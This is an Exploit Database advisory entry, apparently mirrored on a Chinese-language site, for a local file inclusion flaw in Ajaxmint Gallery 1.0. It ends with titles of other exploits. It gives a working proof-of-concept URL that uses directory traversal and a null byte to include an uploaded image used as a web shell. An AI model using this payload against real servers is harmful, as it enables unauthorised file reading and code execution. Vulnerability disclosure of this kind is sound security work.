Ajaxmint Gallery 1.0 – Local File Inclusion

Exploit Database
15 阅读

作者： AkaStep

日期： 2012-05-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37310/

source: https://www.securityfocus.com/bid/53659/info

Ajaxmint Gallery is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and to execute local scripts in the context of the webserver process. This may aid in further attacks.

Ajaxmint Gallery 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/ajaxmint/ajaxmint-gallery/admin/index.php?c=..\..\..\..\ajaxmint-gallery/pictures/5_me.jpg%00 [aka shell]

last Exploits
Ajaxmint Gallery 1.0 – Local File Inclusion的更多信息

OOP CMS BLOG 1.0 – Multiple SQL Injection：
Precurio Intranet Portal 2.0 – Cross-Site Request Forgery (Add Admin)：
m1k1o’s Blog v.10 – Remote Code Execution (RCE) (Authenticated)：
addressbook 9.0.0.1 – ‘id’ SQL Injection：
Joomla! Component com_start – SQL Injection：
PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting：
D-Link WBR-1310 – Authentication Bypass：
TypeSetter 5.1 – CSRF (Change admin e-mail)：